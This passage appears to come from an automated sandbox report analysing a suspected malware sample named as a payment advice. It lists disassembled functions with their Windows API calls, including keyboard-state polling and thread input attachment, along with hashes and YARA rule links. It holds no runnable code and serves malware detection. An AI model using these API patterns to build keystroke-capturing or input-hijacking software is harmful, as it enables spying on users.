                          • Opcode ID: f2537af69be7bdfb8cd077d5fba63d09357e4425d7c4eca9e5473fe3d57dd33a
                          • Instruction ID: d4cab332979e247f8c2da9788294718902473fa09eb5ff996f03d25688ce9cbb
                          • Opcode Fuzzy Hash: f2537af69be7bdfb8cd077d5fba63d09357e4425d7c4eca9e5473fe3d57dd33a
                          • Instruction Fuzzy Hash: C7318B75A083008FC310EF65E48481EB7A1AFC8315F648D2FF945A7362C779D9068BAB
                          Function 00467214 Relevance: 16.8, APIs: 11, Instructions: 313COMMON
                          Download Yara Rule
                          APIs
                          • SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 004672E6
                          • SafeArrayUnaccessData.OLEAUT32(CE8B7824), ref: 0046735D
                          • SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 00467375
                          • SafeArrayUnaccessData.OLEAUT32(CE8B7824), ref: 004673ED
                          • SafeArrayGetVartype.OLEAUT32(CE8B7824,?), ref: 00467418
                          • SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 00467445
                          • SafeArrayUnaccessData.OLEAUT32(CE8B7824), ref: 0046746A
                          • SafeArrayUnaccessData.OLEAUT32(CE8B7824), ref: 00467559
                          • SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 0046748A
                            • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                            • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                            • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                          • SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 00467571
                          • SafeArrayUnaccessData.OLEAUT32(CE8B7824), ref: 004675E4
                            • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: ArraySafe$Data$AccessUnaccess$Exception@8ThrowVartype_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                          • String ID:
                          • API String ID: 1932665248-0
                          • Opcode ID: 2f069d425a14989955c91583bf1eee78d18cf75f4644af0e6fd4452b58d9bd04
                          • Instruction ID: 42a0e90c8bf2b482c85e144861ec280134e9fb1dbd9e00a0d693b148f8e5f150
                          • Opcode Fuzzy Hash: 2f069d425a14989955c91583bf1eee78d18cf75f4644af0e6fd4452b58d9bd04
                          • Instruction Fuzzy Hash: E8B1BF752082009FD304DF29C884B6B77E5FF98318F14496EE98587362E779E885CB6B
                          Function 004480F2 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON
                          Download Yara Rule
                          APIs
                          • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00448182
                          • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00448185
                          • GetWindowLongW.USER32(?,000000F0), ref: 004481A7
                          • _memset.LIBCMT ref: 004481BA
                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004481CC
                          • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 0044824E
                          • SendMessageW.USER32(?,00001074,?,00000007), ref: 004482A4
                          • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 004482BE
                          • SendMessageW.USER32(?,0000101D,00000001,00000000), ref: 004482E3
                          • SendMessageW.USER32(?,0000101E,00000001,00000000), ref: 004482FC
                          • SendMessageW.USER32(?,00001008,?,00000007), ref: 00448317
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: MessageSend$LongWindow_memset
                          • String ID:
                          • API String ID: 830647256-0
                          • Opcode ID: 45db6e2e50868ce621a7577b0335e91e45f99dc9c013701cc26792922a244152
                          • Instruction ID: 69fd08a602074ed3d664547bad3ac5a94a9e6c02d61aa1d07dc3907ec7ad0976
                          • Opcode Fuzzy Hash: 45db6e2e50868ce621a7577b0335e91e45f99dc9c013701cc26792922a244152
                          • Instruction Fuzzy Hash: 41616F70208341AFE310DF54C881FABB7A4FF89704F14465EFA909B2D1DBB5A945CB56
                          Function 0046EA7F Relevance: 16.7, APIs: 11, Instructions: 167windowCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0043343D: InvalidateRect.USER32(?,00000000,00000001), ref: 004334BE
                          • DestroyAcceleratorTable.USER32(?), ref: 0046EA9F
                          • ImageList_Destroy.COMCTL32(?), ref: 0046EB04
                          • ImageList_Destroy.COMCTL32(?), ref: 0046EB18
                          • ImageList_Destroy.COMCTL32(?), ref: 0046EB24
                          • DeleteObject.GDI32(006E0000), ref: 0046EB4F
                          • DestroyIcon.USER32(00730065), ref: 0046EB67
                          • DeleteObject.GDI32(D5BFA712), ref: 0046EB7F
                          • DestroyWindow.USER32(00740069), ref: 0046EB97
                          • DestroyIcon.USER32(?), ref: 0046EBBF
                          • DestroyIcon.USER32(?), ref: 0046EBCD
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: Destroy$IconImageList_$DeleteObject$AcceleratorInvalidateRectTableWindow
                          • String ID:
                          • API String ID: 802431696-0
                          • Opcode ID: 294737084f3018da842919bbfa865d3a976cdf3ad66c8c89ec2250206a47d952
                          • Instruction ID: 42d633cefbe7d7192e7a113645d0a532909e6831d49db23f2259be933aabe8c6
                          • Opcode Fuzzy Hash: 294737084f3018da842919bbfa865d3a976cdf3ad66c8c89ec2250206a47d952
                          • Instruction Fuzzy Hash: 17513178600202DFDB14DF26D894E2A77E9FB4AB14B54446EE502CB361EB38EC41CB5E
                          Function 00444D52 Relevance: 16.6, APIs: 11, Instructions: 132keyboardCOMMON
                          Download Yara Rule
                          APIs
                          • GetKeyboardState.USER32(?,?,?), ref: 00444D8A
                          • GetAsyncKeyState.USER32(000000A0), ref: 00444E0F
                          • GetKeyState.USER32(000000A0), ref: 00444E26
                          • GetAsyncKeyState.USER32(000000A1), ref: 00444E40
                          • GetKeyState.USER32(000000A1), ref: 00444E51
                          • GetAsyncKeyState.USER32(00000011), ref: 00444E69
                          • GetKeyState.USER32(00000011), ref: 00444E77
                          • GetAsyncKeyState.USER32(00000012), ref: 00444E8F
                          • GetKeyState.USER32(00000012), ref: 00444E9D
                          • GetAsyncKeyState.USER32(0000005B), ref: 00444EB5
                          • GetKeyState.USER32(0000005B), ref: 00444EC3
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: State$Async$Keyboard
                          • String ID:
                          • API String ID: 541375521-0
                          • Opcode ID: d4a73a67db12bad31d9fb613c99c8778707defbe90317bf640d05d8e99de570f
                          • Instruction ID: c605e69a62dfc64c618b97cb3a1930d242a0674024be490a091b983f03ece729
                          • Opcode Fuzzy Hash: d4a73a67db12bad31d9fb613c99c8778707defbe90317bf640d05d8e99de570f
                          • Instruction Fuzzy Hash: 6A41C3646087C52DFB31966484017E7FFD16FA2708F58844FD1C5067C2DBAEA9C8C7AA
                          Function 004507E7 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 146windowCOMMON
                          Download Yara Rule
                          APIs
                          • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 004508CB
                          • SendMessageW.USER32(?,00001036,00000000,?), ref: 004508DB
                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,00001036,00000000,?,000000FF,?,SysListView32,004848E8,00000000), ref: 004508FC
                          • _wcslen.LIBCMT ref: 00450944
                          • _wcscat.LIBCMT ref: 00450955
                          • SendMessageW.USER32(?,00001057,00000000,?), ref: 0045096C
                          • SendMessageW.USER32(?,00001061,?,?), ref: 0045099B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: MessageSend$Window_wcscat_wcslen
                          • String ID: -----$SysListView32
                          • API String ID: 4008455318-3975388722
                          • Opcode ID: 1aeeed20face43e167d1a5b6966347104c1855cbe0e780de9d31d79ee612f7fa
                          • Instruction ID: 786a3889ee88f98d9b0e9b4b0e1dacf7018a6923f31dd28eeaa3c07ad082d1a6
                          • Opcode Fuzzy Hash: 1aeeed20face43e167d1a5b6966347104c1855cbe0e780de9d31d79ee612f7fa
                          • Instruction Fuzzy Hash: 17519470504340ABE330DB65C885FABB3E4AF84714F104E1EFA94972D3D6B99989CB65
                          Function 00448602 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 105windowCOMMON
                          Download Yara Rule
                          APIs
                          • _memset.LIBCMT ref: 00448625
                          • CreateMenu.USER32 ref: 0044863C
                          • SetMenu.USER32(?,00000000), ref: 0044864C
                          • GetMenuItemInfoW.USER32(?,?,00000000,004A83D8), ref: 004486D6
                          • IsMenu.USER32(?), ref: 004486EB
                          • CreatePopupMenu.USER32 ref: 004486F5
                          • InsertMenuItemW.USER32(?,?,00000001,004A83D8), ref: 00448739
                          • DrawMenuBar.USER32 ref: 00448742
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                          • String ID: 0
                          • API String ID: 176399719-4108050209
                          • Opcode ID: 4add02930eb798c2c2cb68413aedc402262f89096725e95a36bc963f45c6c407
                          • Instruction ID: 98f94d81d6847d6484dd50bbdc77a0bd9f9f2d632c710d3394220f00cc789bef
                          • Opcode Fuzzy Hash: 4add02930eb798c2c2cb68413aedc402262f89096725e95a36bc963f45c6c407
                          • Instruction Fuzzy Hash: 86417675604201AFD700CF68D894A9BBBE4FF89314F14891EFA488B350DBB5A845CFA6
                          Function 004691F4 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 88windowCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                          • SendMessageW.USER32(00000000,0000018C,000000FF,00000000), ref: 00469277
                          • GetDlgCtrlID.USER32(00000000), ref: 00469289
                          • GetParent.USER32 ref: 004692A4
                          • SendMessageW.USER32(00000000,?,00000111), ref: 004692A7
                          • GetDlgCtrlID.USER32(00000000), ref: 004692AE
                          • GetParent.USER32 ref: 004692C7
                          • SendMessageW.USER32(00000000,?,00000111,?), ref: 004692CA
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: MessageSend$CtrlParent$_wcslen
                          • String ID: ComboBox$ListBox
                          • API String ID: 2040099840-1403004172
                          • Opcode ID: d7a46b5f720fef199203ad69d051b39deebb3b2451f9d950c399d088bcf038a9
                          • Instruction ID: ef07326ddff4210f4741e87947fad3c2ec39ee11b6619cfdf8cc81125e1c6f8c
                          • Opcode Fuzzy Hash: d7a46b5f720fef199203ad69d051b39deebb3b2451f9d950c399d088bcf038a9
                          • Instruction Fuzzy Hash: BC21D6716002147BD600AB65CC45DBFB39CEB85324F044A1FF954A73D1DAB8EC0947B9
                          Function 004693F0 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 87windowCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                          • SendMessageW.USER32(00000186,00000186,?,00000000), ref: 00469471
                          • GetDlgCtrlID.USER32(00000000), ref: 00469483
                          • GetParent.USER32 ref: 0046949E
                          • SendMessageW.USER32(00000000,?,00000111), ref: 004694A1
                          • GetDlgCtrlID.USER32(00000000), ref: 004694A8
                          • GetParent.USER32 ref: 004694C1
                          • SendMessageW.USER32(00000000,?,00000111,?), ref: 004694C4
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: MessageSend$CtrlParent$_wcslen
                          • String ID: ComboBox$ListBox
                          • API String ID: 2040099840-1403004172
                          • Opcode ID: 2e10f5a1695edfae3743bbe69767f09e04e95ab32c83142982b04f1cb5eb07ed
                          • Instruction ID: 434b10a17d45167e777e8ea6e726dd6ee4e01267e4a119798c8aa60e835c5cdc
                          • Opcode Fuzzy Hash: 2e10f5a1695edfae3743bbe69767f09e04e95ab32c83142982b04f1cb5eb07ed
                          • Instruction Fuzzy Hash: CA21D7756002147BD600BB29CC45EBFB39CEB85314F04492FF984A7291EABCEC0A4779
                          Function 00448DAF Relevance: 15.2, APIs: 10, Instructions: 173windowCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 004419ED: DeleteObject.GDI32(?), ref: 00441A53
                          • SendMessageW.USER32(75C123D0,00001001,00000000,00000000), ref: 00448E73
                          • SendMessageW.USER32(75C123D0,00001026,00000000,00000000), ref: 00448E7E
                            • Part of subcall function 00441A7A: CreateSolidBrush.GDI32 ref: 00441ACB
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: MessageSend$BrushCreateDeleteObjectSolid
                          • String ID:
                          • API String ID: 3771399671-0
                          • Opcode ID: 51f09a1d655476e15b4ab454a85655f186203ac899921849c361721d54d31972
                          • Instruction ID: ebbecaf0548398ae771b9aa28ebf0b72f134f9ffbbfb28b2279bd799396bd9e3
                          • Opcode Fuzzy Hash: 51f09a1d655476e15b4ab454a85655f186203ac899921849c361721d54d31972
                          • Instruction Fuzzy Hash: F4510930208300AFE2209F25DD85F6F77EAEB85B14F14091EF994E72D0CBB9E9458769
                          Function 0046ECBF Relevance: 15.1, APIs: 10, Instructions: 101COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: InitVariant$_malloc_wcscpy_wcslen
                          • String ID:
                          • API String ID: 3413494760-0
                          • Opcode ID: 482f3b1f0bd705d72ebf0bcdddfb27694f63f3fe8f528a3bcd533af3ba5d9e97
                          • Instruction ID: 77b59fa0745152fd1b6386ccdd9ca850b9b7f4abb66e551d88b584249de3d357
                          • Opcode Fuzzy Hash: 482f3b1f0bd705d72ebf0bcdddfb27694f63f3fe8f528a3bcd533af3ba5d9e97
                          • Instruction Fuzzy Hash: F83150B2600746AFC714DF7AC880996FBA8FF88310B44892EE64983641D735F554CBA5
                          Function 004377B4 Relevance: 15.1, APIs: 10, Instructions: 97threadCOMMON
                          Download Yara Rule
                          APIs
                          • GetCurrentThreadId.KERNEL32 ref: 004377D7
                          • GetForegroundWindow.USER32(00000000,?,?,?,?,0045FDE0,?,?,00000001), ref: 004377EB
                          • GetWindowThreadProcessId.USER32(00000000), ref: 004377F8
                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,0045FDE0,?,?,00000001), ref: 00437809
                          • GetWindowThreadProcessId.USER32(?,00000001), ref: 00437819
                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,0045FDE0,?,?,00000001), ref: 0043782E
                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,0045FDE0,?,?,00000001), ref: 0043783D
                          • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,0045FDE0,?,?,00000001), ref: 0043788D
                          • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,0045FDE0,?,?,00000001), ref: 004378A1
                          • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,0045FDE0,?,?,00000001), ref: 004378AC
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                          • String ID:
                          • API String ID: 2156557900-0
                          • Opcode ID: f5203a8e23f024bead7fa0256802a4b49a7a8dce25e7908e04b44143f6d1477f
                          • Instruction ID: cf5237ead9178137421241ba4763476990ac919c12b5de4495d1c20f4e3090f4
                          • Opcode Fuzzy Hash: f5203a8e23f024bead7fa0256802a4b49a7a8dce25e7908e04b44143f6d1477f
                          • Instruction Fuzzy Hash: B0316FB1504341AFD768EF28DC88A7BB7A9EF9D310F14182EF44197250D7B89C44CB69
                          Function 0045F776 Relevance: 14.4, APIs: 5, Strings: 3, Instructions: 446COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: __wcsicoll
                          • String ID: 0%d$DOWN$OFF
                          • API String ID: 3832890014-468733193
                          • Opcode ID: b886d43e96c57de01ffb669c6ba173cdd7012b944398daffbb17888043fd80c7
                          • Instruction ID: 3901981f80fa7430cd77b89167089bc3925961a07aad88d0cc2f25a35af8916b
                          • Opcode Fuzzy Hash: b886d43e96c57de01ffb669c6ba173cdd7012b944398daffbb17888043fd80c7
                          • Instruction Fuzzy Hash: B7F1D8614083856DEB21EB21C845BAF7BE85F95309F08092FF98212193D7BCD68DC76B
                          Function 0045E912 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 353timeCOMMON
                          Download Yara Rule
                          APIs
                          • VariantInit.OLEAUT32(00000000), ref: 0045E959
                          • VariantCopy.OLEAUT32(00000000), ref: 0045E963
                          • VariantClear.OLEAUT32 ref: 0045E970
                          • VariantTimeToSystemTime.OLEAUT32 ref: 0045EAEB
                          • __swprintf.LIBCMT ref: 0045EB1F
                          • VarR8FromDec.OLEAUT32(?,?), ref: 0045EB61
                          • VariantInit.OLEAUT32(00000000), ref: 0045EBE7
                          Strings
                          • %4d%02d%02d%02d%02d%02d, xrefs: 0045EB19
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: Variant$InitTime$ClearCopyFromSystem__swprintf
                          • String ID: %4d%02d%02d%02d%02d%02d
                          • API String ID: 43541914-1568723262
                          • Opcode ID: 11e75855299ae3405c424824ea34456a4e4a4cfcb6a1aa253e4cc896e09893c9
                          • Instruction ID: db8708ae94f177a13b26e6bf0e0b18ed2eb17208bc27bd00c320e315e6f9d40a
                          • Opcode Fuzzy Hash: 11e75855299ae3405c424824ea34456a4e4a4cfcb6a1aa253e4cc896e09893c9
                          • Instruction Fuzzy Hash: ABC1F4BB1006019BC704AF06D480666F7A1FFD4322F14896FED984B341DB3AE95ED7A6
                          Function 0042FE54 Relevance: 14.3, APIs: 4, Strings: 4, Instructions: 298sleepCOMMON
                          Download Yara Rule
                          APIs
                          • InterlockedDecrement.KERNEL32(004A7CAC), ref: 0042FE66
                          • Sleep.KERNEL32(0000000A), ref: 0042FE6E
                          • InterlockedDecrement.KERNEL32(004A7CAC), ref: 0042FF5D
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: DecrementInterlocked$Sleep
                          • String ID: 0vH$0vH$4RH0vH$@COM_EVENTOBJ
                          • API String ID: 2250217261-3412429629
                          • Opcode ID: 7d20af892ce27232a3ff337619be48fed7d74e1bde2de334c7b49ab88d15dd8c
                          • Instruction ID: 990b5f35a06538e4ae7b6c94f393f4a5fafaaf51bfa382c75dcb300f2d234fa3
                          • Opcode Fuzzy Hash: 7d20af892ce27232a3ff337619be48fed7d74e1bde2de334c7b49ab88d15dd8c
                          • Instruction Fuzzy Hash: E0B1C0715083009FC714EF54C990A5FB3E4AF98304F508A2FF495972A2DB78ED4ACB9A
                          Function 004689FF Relevance: 14.3, APIs: 2, Strings: 6, Instructions: 288COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
